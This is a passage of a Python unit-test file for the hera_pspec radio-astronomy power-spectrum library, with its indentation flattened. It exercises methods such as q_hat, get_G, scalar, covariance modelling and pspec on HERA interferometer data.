#make sure no errors are thrown by get_V, get_E, etc...
ds1.get_unnormed_E(key1, key2)
ds1.get_unnormed_V(key1, key2)
h=ds1.get_H(key1, key2)
g=ds1.get_G(key1, key2)
ds1.get_MW(g, h)
#make sure identity weighting isn't broken.
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
ds1 = copy.deepcopy(self.ds)
ds1.set_spw((10,Nfreq-10))
ds1.set_weighting('identity')
ds1.set_symmetric_taper(False)
ds1.set_filter_extension([10,10])
rm1 = ds1.R(key1)
def test_q_hat(self):
"""
Test that q_hat has right shape and accepts keys in the right format.
"""
# Set weights and pack data into PSpecData
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
Nfreq = self.ds.Nfreqs
Ntime = self.ds.Ntimes
Ndlys = Nfreq - 3
self.ds.spw_Ndlys = Ndlys
# Set baselines to use for tests
key1 = (0, 24, 38)
key2 = (1, 25, 38)
key3 = [(0, 24, 38), (0, 24, 38)]
key4 = [(1, 25, 38), (1, 25, 38)]
for input_data_weight in ['identity', 'iC', 'dayenu']:
self.ds.set_weighting(input_data_weight)
if input_data_weight == 'dayenu':
pytest.raises(ValueError,self.ds.R, key1)
rpk = {'filter_centers':[0.],'filter_half_widths':[0.],'filter_factors':[0.]}
self.ds.set_r_param(key1,rpk)
self.ds.set_r_param(key2,rpk)
# Loop over list of taper functions
for taper in taper_selection:
self.ds.set_taper(taper)
# Calculate q_hat for a pair of baselines and test output shape
q_hat_a = self.ds.q_hat(key1, key2)
self.assertEqual(q_hat_a.shape, (Ndlys, Ntime))
# Check that swapping x_1 <-> x_2 results in complex conj. only
q_hat_b = self.ds.q_hat(key2, key1)
q_hat_diff = np.conjugate(q_hat_a) - q_hat_b
for i in range(Ndlys):
for j in range(Ntime):
self.assertAlmostEqual(q_hat_diff[i,j].real,
q_hat_diff[i,j].real)
self.assertAlmostEqual(q_hat_diff[i,j].imag,
q_hat_diff[i,j].imag)
# Check that lists of keys are handled properly
q_hat_aa = self.ds.q_hat(key1, key4) # q_hat(x1, x2+x2)
q_hat_bb = self.ds.q_hat(key4, key1) # q_hat(x2+x2, x1)
q_hat_cc = self.ds.q_hat(key3, key4) # q_hat(x1+x1, x2+x2)
# Effectively checks that q_hat(2*x1, 2*x2) = 4*q_hat(x1, x2)
for i in range(Ndlys):
for j in range(Ntime):
self.assertAlmostEqual(q_hat_a[i,j].real,
0.25 * q_hat_cc[i,j].real)
self.assertAlmostEqual(q_hat_a[i,j].imag,
0.25 * q_hat_cc[i,j].imag)
self.ds.spw_Ndlys = Nfreq
# Check that the slow method is the same as the FFT method
for input_data_weight in ['identity', 'iC', 'dayenu']:
self.ds.set_weighting(input_data_weight)
# Loop over list of taper functions
for taper in taper_selection:
self.ds.set_taper(taper)
q_hat_a_slow = self.ds.q_hat(key1, key2, allow_fft=False)
q_hat_a = self.ds.q_hat(key1, key2, allow_fft=True)
self.assertTrue(np.isclose(np.real(q_hat_a/q_hat_a_slow), 1).all())
self.assertTrue(np.isclose(np.imag(q_hat_a/q_hat_a_slow), 0, atol=1e-6).all())
#Test if error is raised when one tried FFT approach on exact_norm
pytest.raises(NotImplementedError, self.ds.q_hat, key1, key2, exact_norm=True, allow_fft = True)
def test_get_H(self):
"""
Test Fisher/weight matrix calculation.
"""
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
Nfreq = self.ds.Nfreqs
multiplicative_tolerance = 1.
key1 = (0, 24, 38)
key2 = (1, 25, 38)
for input_data_weight in ['identity','iC', 'dayenu']:
self.ds.set_weighting(input_data_weight)
if input_data_weight == 'dayenu':
pytest.raises(ValueError,self.ds.R, key1)
rpk = {'filter_centers':[0.],'filter_half_widths':[0.],'filter_factors':[0.]}
self.ds.set_r_param(key1,rpk)
self.ds.set_r_param(key2,rpk)
for taper in taper_selection:
self.ds.set_taper(taper)
self.ds.set_Ndlys(Nfreq//3)
H = self.ds.get_H(key1, key2)
self.assertEqual(H.shape, (Nfreq//3, Nfreq//3)) # Test shape
self.ds.set_Ndlys()
H = self.ds.get_H(key1, key2)
self.assertEqual(H.shape, (Nfreq, Nfreq)) # Test shape
def test_get_G(self):
"""
Test Fisher/weight matrix calculation.
"""
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
Nfreq = self.ds.Nfreqs
multiplicative_tolerance = 1.
key1 = (0, 24, 38)
key2 = (1, 25, 38)
for input_data_weight in ['identity','iC', 'dayenu']:
self.ds.set_weighting(input_data_weight)
if input_data_weight == 'dayenu':
pytest.raises(ValueError,self.ds.R, key1)
rpk = {'filter_centers':[0.],'filter_half_widths':[0.],'filter_factors':[0.]}
self.ds.set_r_param(key1,rpk)
self.ds.set_r_param(key2,rpk)
for taper in taper_selection:
self.ds.clear_cache()
self.ds.set_taper(taper)
#print 'input_data_weight', input_data_weight
self.ds.set_Ndlys(Nfreq-2)
G = self.ds.get_G(key1, key2)
self.assertEqual(G.shape, (Nfreq-2, Nfreq-2)) # Test shape
#print np.min(np.abs(G)), np.min(np.abs(np.linalg.eigvalsh(G)))
matrix_scale = np.min(np.abs(np.linalg.eigvalsh(G)))
if input_data_weight == 'identity':
# In the identity case, there are three special properties
# that are respected:
# i) Symmetry: G_ab = G_ba
# ii) Cylic property: G = (1/2) tr[R1 Q_a R2 Q_b]
# = (1/2) tr[R2 Q_b R1 Q_a]
# iii) All elements of G are positive.
# Test symmetry
anti_sym_norm = np.linalg.norm(G - G.T)
self.assertLessEqual(anti_sym_norm,
matrix_scale * multiplicative_tolerance)
# Test cyclic property of trace, where key1 and key2 can be
# swapped without changing the matrix. This is secretly the
# same test as the symmetry test, but perhaps there are
# creative ways to break the code to break one test but not
# the other.
G_swapped = self.ds.get_G(key2, key1)
G_diff_norm = np.linalg.norm(G - G_swapped)
self.assertLessEqual(G_diff_norm,
matrix_scale * multiplicative_tolerance)
min_diagonal = np.min(np.diagonal(G))
# Test that all elements of G are positive up to numerical
# noise with the threshold set to 10 orders of magnitude
# down from the smallest value on the diagonal
for i in range(Nfreq-2):
for j in range(Nfreq-2):
self.assertGreaterEqual(G[i,j],
-min_diagonal * multiplicative_tolerance)
else:
# In general, when R_1 != R_2, there is a more restricted
# symmetry where swapping R_1 and R_2 *and* taking the
# transpose gives the same result
#UPDATE: Taper now occurs after filter so this
#symmetry only holds when taper = 'none'.
if taper_selection == 'none':
G_swapped = self.ds.get_G(key2, key1)
G_diff_norm = np.linalg.norm(G - G_swapped.T)
self.assertLessEqual(G_diff_norm,
matrix_scale * multiplicative_tolerance)
"""
Under Construction
def test_parseval(self):
# Test that output power spectrum respects Parseval's theorem.
np.random.seed(10)
variance_in = 1.
Nfreq = self.d[0].Nfreqs
data = self.d[0]
# Use only the requested number of channels
data.select(freq_chans=range(Nfreq), bls=[(24,24),])
# Make it so that the test data is unflagged everywhere
data.flag_array[:] = False
# Get list of available baselines and LSTs
bls = data.get_antpairs()
nlsts = data.Ntimes
# Simulate data given a Fourier-space power spectrum
pk = variance_in * np.ones(Nfreq)
# Make realisation of (complex) white noise in real space
g = 1.0 * np.random.normal(size=(nlsts,Nfreq)) \
+ 1.j * np.random.normal(size=(nlsts,Nfreq))
g /= np.sqrt(2.) # Since Re(C) = Im(C) = C/2
x = data.freq_array[0]
dx = x[1] - x[0]
# Fourier transform along freq. direction in each LST bin
gnew = np.zeros(g.shape).astype(complex)
fnew = np.zeros(g.shape).astype(complex)
for i in range(nlsts):
f = np.fft.fft(g[i]) * np.sqrt(pk)
fnew[i] = f
gnew[i] = np.fft.ifft(f)
# Parseval's theorem test: integral of F^2(k) dk = integral of f^2(x) dx
k = np.fft.fftshift( np.fft.fftfreq(Nfreq, d=(x[1]-x[0])) )
fsq = np.fft.fftshift( np.mean(fnew * fnew.conj(), axis=0) )
gsq = np.mean(gnew * gnew.conj(), axis=0)
# Realize set of Gaussian random datasets and pack into PSpecData
data.data_array = np.expand_dims(np.expand_dims(gnew, axis=1), axis=3)
ds = pspecdata.PSpecData()
ds.add([data, data], [None, None])
# Use true covariance instead
exact_cov = {
(0,24,24): np.eye(Nfreq),
(1,24,24): np.eye(Nfreq)
}
ds.set_C(exact_cov)
# Calculate OQE power spectrum using true covariance matrix
tau = np.fft.fftshift( ds.delays() )
ps, _ = ds.pspec(bls, input_data_weight='iC', norm='I')
ps_avg = np.fft.fftshift( np.mean(ps[0], axis=1) )
# Calculate integrals for Parseval's theorem
parseval_real = simps(gsq, x)
parseval_ft = dx**2. * simps(fsq, k)
parseval_phat = simps(ps_avg, tau)
# Report on results for different ways of calculating Parseval integrals
print "Parseval's theorem:"
print " \int [g(x)]^2 dx = %3.6e, %3.6e" % (parseval_real.real,
parseval_real.imag)
print " \int [f(k)]^2 dk = %3.6e, %3.6e" % (parseval_ft.real,
parseval_ft.imag)
print " \int p_hat(k) dk = %3.6e, %3.6e" % (parseval_phat.real,
parseval_phat.imag)
# Perform approx. equality test (this is a stochastic quantity, so we
# only expect equality to ~10^-2 to 10^-3
np.testing.assert_allclose(parseval_phat, parseval_real, rtol=1e-3)
"""
def test_scalar_delay_adjustment(self):
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w, beam=self.bm)
key1 = (0, 24, 38)
key2 = (1, 25, 38)
# Test that when:
# i) Nfreqs = Ndlys, ii) Sampling, iii) No tapering, iv) R is identity
# are all satisfied, the scalar adjustment factor is unity
self.ds.set_weighting('identity')
self.ds.spw_Ndlys = self.ds.spw_Nfreqs
adjustment = self.ds.scalar_delay_adjustment(key1, key2, sampling=True)
self.assertAlmostEqual(adjustment, 1.0)
self.ds.set_weighting('iC')
#if weighting is not identity, then the adjustment should be a vector.
adjustment = self.ds.scalar_delay_adjustment(key1, key2, sampling=True)
self.assertTrue(len(adjustment) == self.ds.spw_Ndlys)
def test_scalar(self):
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w, beam=self.bm)
gauss = pspecbeam.PSpecBeamGauss(0.8,
np.linspace(115e6, 130e6, 50, endpoint=False))
ds2 = pspecdata.PSpecData(dsets=self.d, wgts=self.w, beam=gauss)
# Check normal execution
scalar = self.ds.scalar(('xx','xx'))
scalar_xx = self.ds.scalar('xx') # Can use single pol string as shorthand
assert scalar == scalar_xx
scalar = self.ds.scalar(1515) # polpair-integer = ('xx', 'xx')
scalar = self.ds.scalar(('xx','xx'), taper_override='none')
scalar = self.ds.scalar(('xx','xx'), beam=gauss)
pytest.raises(NotImplementedError, self.ds.scalar, ('xx','yy'))
# Precomputed results in the following test were done "by hand"
# using iPython notebook "Scalar_dev2.ipynb" in the tests/ directory
# FIXME: Uncomment when pyuvdata support for this is ready
#scalar = self.ds.scalar()
#self.assertAlmostEqual(scalar, 3732415176.85 / 10.**9)
# FIXME: Remove this when pyuvdata support for the above is ready
#self.assertRaises(NotImplementedError, self.ds.scalar)
def test_validate_datasets(self):
# test freq exception
uvd = copy.deepcopy(self.d[0])
uvd2 = uvd.select(frequencies=np.unique(uvd.freq_array)[:10],
inplace=False)
ds = pspecdata.PSpecData(dsets=[uvd, uvd2], wgts=[None, None])
pytest.raises(ValueError, ds.validate_datasets)
# test time exception
uvd2 = uvd.select(times=np.unique(uvd.time_array)[:10], inplace=False)
ds = pspecdata.PSpecData(dsets=[uvd, uvd2], wgts=[None, None])
pytest.raises(ValueError, ds.validate_datasets)
# test label exception
_labels = ds.labels
ds.labels = ds.labels[:1]
pytest.raises(ValueError, ds.validate_datasets)
ds.labels = _labels
# test std exception
_std = ds.dsets_std
ds.dsets_std = ds.dsets_std[:1]
pytest.raises(ValueError, ds.validate_datasets)
ds.dsets_std = _std
# test wgt exception
_wgts = ds.wgts
ds.wgts = ds.wgts[:1]
pytest.raises(ValueError, ds.validate_datasets)
ds.wgts = _wgts
# test warnings
uvd = copy.deepcopy(self.d[0])
uvd2 = copy.deepcopy(self.d[0])
uvd.select(frequencies=np.unique(uvd.freq_array)[:10],
times=np.unique(uvd.time_array)[:10])
uvd2.select(frequencies=np.unique(uvd2.freq_array)[10:20],
times=np.unique(uvd2.time_array)[10:20])
ds = pspecdata.PSpecData(dsets=[uvd, uvd2], wgts=[None, None])
ds.validate_datasets()
# test phasing
uvd = copy.deepcopy(self.d[0])
uvd2 = copy.deepcopy(self.d[0])
uvd.phase_to_time(Time(2458042, format='jd'))
ds = pspecdata.PSpecData(dsets=[uvd, uvd2], wgts=[None, None])
pytest.raises(ValueError, ds.validate_datasets)
uvd2.phase_to_time(Time(2458042.5, format='jd'))
ds.validate_datasets()
# test polarization
ds.validate_pol((0,1), ('xx', 'xx'))
# test channel widths
uvd2.channel_width *= 2.
ds2 = pspecdata.PSpecData(dsets=[uvd, uvd2], wgts=[None, None])
pytest.raises(ValueError, ds2.validate_datasets)
def test_rephase_to_dset(self):
# get uvd
uvd1 = copy.deepcopy(self.uvd)
# give the uvd an x_orientation to test x_orientation propagation
uvd1.x_orienation = 'east'
# null test: check nothing changes when dsets contain same UVData object
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd1), copy.deepcopy(uvd1)], wgts=[None, None])
# get normal pspec
bls = [(37, 39)]
uvp1 = ds.pspec(bls, bls, (0, 1), pols=('xx','xx'), verbose=False)
# rephase and get pspec
ds.rephase_to_dset(0)
uvp2 = ds.pspec(bls, bls, (0, 1), pols=('xx','xx'), verbose=False)
blp = (0, ((37,39),(37,39)), ('xx','xx'))
assert np.isclose(np.abs(uvp2.get_data(blp)/uvp1.get_data(blp)), 1.0).min()
def test_Jy_to_mK(self):
# test basic execution
uvd = self.uvd
uvd.vis_units = 'Jy'
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)],
wgts=[None, None], beam=self.bm)
ds.Jy_to_mK()
assert ds.dsets[0].vis_units == 'mK'
assert ds.dsets[1].vis_units == 'mK'
assert uvd.get_data(24, 25, 'xx')[30, 30] \
/ ds.dsets[0].get_data(24, 25, 'xx')[30, 30] < 1.0
# test feeding beam
ds2 = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)],
wgts=[None, None], beam=self.bm)
ds2.Jy_to_mK(beam=self.bm)
assert ds.dsets[0] == ds2.dsets[0]
# test vis_units no Jansky
uvd2 = copy.deepcopy(uvd)
uvd2.polarization_array[0] = -6
uvd2.vis_units = 'UNCALIB'
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd2)],
wgts=[None, None], beam=self.bm)
ds.Jy_to_mK()
assert ds.dsets[0].vis_units == "mK"
assert ds.dsets[1].vis_units == "UNCALIB"
assert ds.dsets[0].get_data(24, 25, 'xx')[30, 30] != ds.dsets[1].get_data(24, 25, 'yy')[30, 30]
def test_trim_dset_lsts(self):
fname = os.path.join(DATA_PATH, "zen.2458042.17772.xx.HH.uvXA")
uvd1 = UVData()
uvd1.read_miriad(fname)
uvd2 = copy.deepcopy(uvd1)
uvd2.lst_array = (uvd2.lst_array + 10. * np.median(np.diff(np.unique(uvd2.lst_array)))) % (2.*np.pi)
# test basic execution
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd1), copy.deepcopy(uvd2)], wgts=[None, None])
ds.trim_dset_lsts()
assert ds.dsets[0].Ntimes == 50
assert ds.dsets[1].Ntimes == 50
assert np.all( (2458042.178948477 < ds.dsets[0].time_array) \
+ (ds.dsets[0].time_array < 2458042.1843023109))
# test exception
uvd2.lst_array += np.linspace(0, 1e-3, uvd2.Nblts)
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd1), copy.deepcopy(uvd2)], wgts=[None, None])
pytest.raises(ValueError, ds.trim_dset_lsts)
assert ds.dsets[0].Ntimes == 60
assert ds.dsets[1].Ntimes == 60
def test_units(self):
ds = pspecdata.PSpecData()
# test exception
pytest.raises(IndexError, ds.units)
ds.add(self.uvd, None)
# test basic execution
vis_u, norm_u = ds.units(little_h=False)
vis_u, norm_u = ds.units()
assert vis_u == "UNCALIB"
assert norm_u == "Hz str [beam normalization not specified]"
ds_b = pspecdata.PSpecData(dsets=[self.uvd, self.uvd],
wgts=[None, None], beam=self.bm)
vis_u, norm_u = ds_b.units(little_h=False)
assert norm_u == "Mpc^3"
def test_delays(self):
ds = pspecdata.PSpecData()
# test exception
pytest.raises(IndexError, ds.delays)
ds.add([self.uvd, self.uvd], [None, None])
d = ds.delays()
assert len(d) == ds.dsets[0].Nfreqs
def test_check_in_dset(self):
# generate ds
uvd = copy.deepcopy(self.d[0])
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None])
# check for existing key
assert ds.check_key_in_dset(('xx'), 0)
assert ds.check_key_in_dset((24, 25), 0)
assert ds.check_key_in_dset((24, 25, 'xx'), 0)
# check for non-existing key
assert ds.check_key_in_dset('yy', 0) == False
assert ds.check_key_in_dset((24, 26), 0) == False
assert ds.check_key_in_dset((24, 26, 'yy'), 0) == False
# check exception
pytest.raises(KeyError, ds.check_key_in_dset, (1,2,3,4,5), 0)
# test dset_idx
pytest.raises(TypeError, ds.dset_idx, (1,2))
def test_C_model(self):
# test the key format in ds._C and the shape of stored covariance
uvd = UVData()
uvd.read(os.path.join(DATA_PATH, 'zen.even.xx.LST.1.28828.uvOCRSA'))
cosmo = conversions.Cosmo_Conversions()
uvb = pspecbeam.PSpecBeamUV(os.path.join(DATA_PATH, 'HERA_NF_dipole_power.beamfits'), cosmo=cosmo)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=uvb)
spws = utils.spw_range_from_freqs(uvd, freq_range=[(160e6, 165e6), (160e6, 165e6)], bounds_error=True)
antpos, ants = uvd.get_ENU_antpos(pick_data_ants=True)
antpos = dict(zip(ants, antpos))
red_bls = redcal.get_pos_reds(antpos, bl_error_tol=1.0)
bls1, bls2, blpairs = utils.construct_blpairs(red_bls[3], exclude_auto_bls=True, exclude_permutations=True)
ds.set_spw(spws[0])
key = (0,bls1[0],"xx")
ds.C_model(key, model='empirical', time_index=0)
assert( ((0, 0), ((bls1[0][0],bls1[0][1] ,"xx"),(bls1[0][0],bls1[0][1] ,"xx")), 'empirical', None, False, True,) in ds._C.keys())
ds.C_model(key, model='autos', time_index=0)
assert( ((0, 0), ((bls1[0][0],bls1[0][1] ,"xx"), (bls1[0][0],bls1[0][1] ,"xx")), 'autos', 0, False, True,) in ds._C.keys())
for Ckey in ds._C.keys():
assert ds._C[Ckey].shape == (spws[0][1]-spws[0][0], spws[0][1]-spws[0][0])
ds.set_spw(spws[1])
key = (0,bls1[0],"xx")
known_cov = {}
model = 'known'
Ckey = ((0, 0), ((bls1[0][0],bls1[0][1] ,"xx"),(bls1[0][0],bls1[0][1] ,"xx")), 'known', 0, False, True,)
known_cov[Ckey] = np.diag(np.ones(uvd.Nfreqs))
ds.C_model(key, model='known', time_index=0, known_cov=known_cov)
assert ( Ckey in ds._C.keys())
assert ds._C[Ckey].shape == (spws[1][1]-spws[1][0], spws[1][1]-spws[1][0])
def test_get_analytic_covariance(self):
uvd = UVData()
uvd.read(os.path.join(DATA_PATH, 'zen.even.xx.LST.1.28828.uvOCRSA'))
uvd.nsample_array[:] = 1.0
uvd.flag_array[:] = False
cosmo = conversions.Cosmo_Conversions()
uvb = pspecbeam.PSpecBeamUV(os.path.join(DATA_PATH, 'HERA_NF_dipole_power.beamfits'), cosmo=cosmo)
# extend time axis by factor of 4
for i in range(2):
new = copy.deepcopy(uvd)
new.time_array += new.Ntimes * np.diff(np.unique(new.time_array))[0]
new.lst_array = uvutils.get_lst_for_time(new.time_array, *new.telescope_location_lat_lon_alt_degrees)
uvd += new
# get redundant baselines
reds, lens, angs = utils.get_reds(uvd, pick_data_ants=True)
# append roughly 20 blpairs to a list
bls1, bls2 = [], []
for red in reds[:3]:
_bls1, _bls2, _ = utils.construct_blpairs(red, exclude_auto_bls=False, exclude_cross_bls=False, exclude_permutations=False)
bls1.extend(_bls1)
bls2.extend(_bls2)
# keep only 20 blpairs for speed (each with 40 independent time samples)
bls1, bls2 = bls1[:20], bls2[:20]
Nblpairs = len(bls1)
# generate a sky and noise simulation: each bl has the same FG signal, constant in time
# but has a different noise realization
np.random.seed(0)
sim1 = testing.sky_noise_sim(uvd, uvb, cov_amp=1000, cov_length_scale=10, constant_per_bl=True,
constant_in_time=True, bl_loop_seed=0, divide_by_nsamp=False)
np.random.seed(0)
sim2 = testing.sky_noise_sim(uvd, uvb, cov_amp=1000, cov_length_scale=10, constant_per_bl=True,
constant_in_time=True, bl_loop_seed=1, divide_by_nsamp=False)
# setup ds
ds = pspecdata.PSpecData(dsets=[sim1, sim2], wgts=[None, None], beam=uvb)
ds.Jy_to_mK()
# assert that imag component of covariance is near zero
key1 = (0, bls1[0], "xx")
key2 = (1, bls2[0], "xx")
ds.set_spw((60, 90))
M_ = np.diag(np.ones(ds.spw_Ndlys))
for model in ['autos', 'empirical']:
(cov_q_real, cov_q_imag, cov_p_real,
cov_p_imag) = ds.get_analytic_covariance(key1, key2, M=M_, exact_norm=False, pol=False,
model=model, known_cov=None)
# assert these arrays are effectively real-valued, even though they are complex type.
# some numerical noise can leak-in, so check to within a dynamic range of peak real power.
for cov in [cov_q_real, cov_q_imag, cov_p_real, cov_p_imag]:
assert np.isclose(cov.imag, 0, atol=abs(cov.real).max() / 1e10).all()
# Here we generate a known_cov to be passed to ds.pspec, which stores two cov_models named 'dsets' and 'fiducial'.
# The two models have actually the same data, while in generating output covariance, 'dsets' mode will follow the shorter
# path where we use some optimization for diagonal matrices, while 'fiducial' mode will follow the longer path
# where there is no such optimization. This test should show the results from two paths are equivalent.
known_cov_test = dict()
C_n_11 = np.diag([2.]*ds.Nfreqs)
P_n_11, S_n_11, C_n_12, P_n_12, S_n_12 = np.zeros_like(C_n_11), np.zeros_like(C_n_11), np.zeros_like(C_n_11), np.zeros_like(C_n_11), np.zeros_like(C_n_11)
models = ['dsets','fiducial']
for model in models:
for blpair in list(zip(bls1, bls2)):
for time_index in range(ds.Ntimes):
key1 = (0,blpair[0],'xx')
dset1, bl1 = ds.parse_blkey(key1)
key2 = (1,blpair[1],'xx')
dset2, bl2 = ds.parse_blkey(key2)
Ckey = ((dset1, dset1), (bl1,bl1), ) + (model, time_index, False, True,)
known_cov_test[Ckey] = C_n_11
Ckey = ((dset1, dset1), (bl1,bl1), ) + (model, time_index, False, False,)
known_cov_test[Ckey] = P_n_11
Ckey = ((dset1, dset1), (bl1,bl1), ) + (model, time_index, True, True,)
known_cov_test[Ckey] = S_n_11
Ckey = ((dset2, dset2), (bl2,bl2), ) + (model, time_index, False, True,)
known_cov_test[Ckey] = C_n_11
Ckey = ((dset2, dset2), (bl2,bl2), ) + (model, time_index, False, False,)
known_cov_test[Ckey] = P_n_11
Ckey = ((dset2, dset2), (bl2,bl2), ) + (model, time_index, True, True,)
known_cov_test[Ckey] = S_n_11
Ckey = ((dset1, dset2), (bl1,bl2), ) + (model, time_index, False, True,)
known_cov_test[Ckey] = C_n_12
Ckey = ((dset2, dset1), (bl2,bl1), ) + (model, time_index, False, True,)
known_cov_test[Ckey] = C_n_12
Ckey = ((dset2, dset1), (bl2,bl1), ) + (model, time_index, False, False,)
known_cov_test[Ckey] = P_n_12
Ckey = ((dset2, dset1), (bl2,bl1), ) + (model, time_index, True, True,)
known_cov_test[Ckey] = S_n_12
uvp_dsets_cov = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), spw_ranges=(60, 90), store_cov=True,
cov_model='dsets', known_cov=known_cov_test, verbose=False, taper='bh')
uvp_fiducial_cov = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), spw_ranges=(60, 90), store_cov=True,
cov_model='fiducial', known_cov=known_cov_test, verbose=False, taper='bh')
# check their cov_array are equal
assert np.allclose(uvp_dsets_cov.cov_array_real[0], uvp_fiducial_cov.cov_array_real[0], rtol=1e-05)
# check noise floor computation from auto correlations
uvp_auto_cov = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), spw_ranges=(60, 90), store_cov=True,
cov_model='autos', verbose=False, taper='bh')
# get RMS of noise-dominated bandpowers for uvp_auto_cov
noise_dlys = np.abs(uvp_auto_cov.get_dlys(0) * 1e9) > 1000
rms = []
for key in uvp_auto_cov.get_all_keys():
rms.append(np.std(uvp_auto_cov.get_data(key).real \
/ np.sqrt(np.diagonal(uvp_auto_cov.get_cov(key).real, axis1=1, axis2=2)), axis=0))
rms = np.mean(rms, axis=0)
# assert this is close to 1.0
assert np.isclose(np.mean(rms[noise_dlys]), 1.0, atol=0.1)
# check signal + noise floor computation
uvp_fgdep_cov = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), spw_ranges=(60, 90), store_cov=True,
cov_model='foreground_dependent', verbose=False, taper='bh')
# get RMS of data: divisor is foreground_dependent covariance this time
# b/c noise in empirically estimated fg-dep cov yields biased errorbar (tavg is not unbiased, but less-biased)
rms = []
for key in uvp_fgdep_cov.get_all_keys():
rms.append(np.std(uvp_fgdep_cov.get_data(key)[:,~noise_dlys].real \
/ np.sqrt(np.mean(np.diagonal(uvp_fgdep_cov.get_cov(key).real, axis1=1, axis2=2)[:,~noise_dlys], axis=0)), axis=0))
rms = np.mean(rms, axis=0)
# assert this is close to 1.0
assert np.isclose(np.mean(rms), 1.0, atol=0.1)
def test_pspec(self):
# generate ds
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None],beam=self.bm, labels=['red', 'blue'])
# check basic execution with baseline list
bls = [(24, 25), (37, 38), (38, 39), (52, 53)]
uvp = ds.pspec(bls, bls, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=False)
assert len(uvp.bl_array) == len(bls)
assert (uvp.antnums_to_blpair(((24, 25), (24, 25))) in uvp.blpair_array)
assert uvp.data_array[0].dtype == np.complex128
assert uvp.data_array[0].shape == (240, 64, 1)
#test for different forms of input parameters
ds.pspec(bls, bls, (0, 1), ('xx','xx'), spw_ranges=(10,20))
ds.pspec(bls, bls, (0, 1), ('xx','xx'), n_dlys=10, spw_ranges=[(10,20)])
ds.pspec(bls, bls, (0, 1), ('xx','xx'), n_dlys=1)
my_r_params = {}
my_r_params_dset0_only = {}
rp = {'filter_centers':[0.],
'filter_half_widths':[250e-9],
'filter_factors':[1e-9]}
for bl in bls:
key1 = (0,) + bl + ('xx',)
key2 = (1,) + bl + ('xx',)
my_r_params[key1] = rp
my_r_params_dset0_only[key1] = rp
my_r_params[key2] = rp
#test inverse sinc weighting.
ds.pspec(bls,bls,(0, 1), ('xx','xx'),
spw_ranges = (10,20), input_data_weight = 'dayenu',
r_params = my_r_params)
#test value error
pytest.raises(ValueError, ds.pspec, bls, bls, (0, 1), ('xx','xx'),
spw_ranges = (10,20), input_data_weight = 'dayenu', r_params = {})
#test value error no dset1 keys
pytest.raises(ValueError, ds.pspec, bls, bls, (0, 1), ('xx','xx'),
spw_ranges = (10,20), input_data_weight = 'dayenu',
r_params = my_r_params_dset0_only)
#assert error if baselines are not provided in the right format
pytest.raises(NotImplementedError, ds.pspec, [[(24,25),(38,39)]],[[(24,25),(38,39)]],
(0,1),[('xx','xx')])
# compare the output of get_Q function with analytical estimates
ds_Q = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None],beam=self.bm_Q)
bls_Q = [(24, 25)]
uvp = ds_Q.pspec(bls_Q, bls_Q, (0, 1), [('xx', 'xx')], input_data_weight='identity',
norm='I', taper='none', verbose=True, exact_norm=False)
Q_sample = ds_Q.get_integral_beam('xx') #Get integral beam for pol 'xx'
assert np.shape(Q_sample) == (ds_Q.spw_range[1] - ds_Q.spw_range[0],\
ds_Q.spw_range[1] - ds_Q.spw_range[0]) #Check for the right shape
estimated_Q = (1.0/(4*np.pi)) * np.ones_like(Q_sample)
assert np.allclose(np.real(estimated_Q), np.real(Q_sample), rtol=1e-05)
#Test if the two pipelines match
ds_t = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm_Q)
uvp_new = ds_t.pspec(bls_Q, bls_Q, (0, 1), [('xx', 'xx')], input_data_weight='identity',
norm='I', taper='none', verbose=True, exact_norm=True)
uvp_ext = ds_t.pspec(bls_Q, bls_Q, (0, 1), [('xx', 'xx')], input_data_weight='identity',
norm='I', taper='none', verbose=True, exact_norm=False)
spw = 0
blp = (bls_Q[0], bls_Q[0])
key = (<KEY> 'xx')
power_real_new = (np.real(uvp_new.get_data(key)))
power_real_ext = (np.real(uvp_ext.get_data(key)))
diff = np.median((power_real_new-power_real_ext)/power_real_ext)
assert diff <= 0.05
# check with redundant baseline group list
antpos, ants = uvd.get_ENU_antpos(pick_data_ants=True)
antpos = dict(zip(ants, antpos))
red_bls = [sorted(blg) for blg in redcal.get_pos_reds(antpos)][2]
bls1, bls2, blps = utils.construct_blpairs(red_bls, exclude_permutations=True)
uvp = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=False)
assert uvp.antnums_to_blpair(((24, 25), (37, 38))) in uvp.blpair_array
assert uvp.Nblpairs == 10
uvp = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=False)
assert uvp.antnums_to_blpair(((24, 25), (52, 53))) in uvp.blpair_array
assert uvp.antnums_to_blpair(((52, 53), (24, 25))) not in uvp.blpair_array
assert uvp.Nblpairs == 10
# test mixed bl group and non blgroup, currently bl grouping of more than 1 blpair doesn't work
bls1 = [[(24, 25)], (52, 53)]
bls2 = [[(24, 25)], (52, 53)]
uvp = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=False)
# test select
red_bls = [(24, 25), (37, 38), (38, 39), (52, 53)]
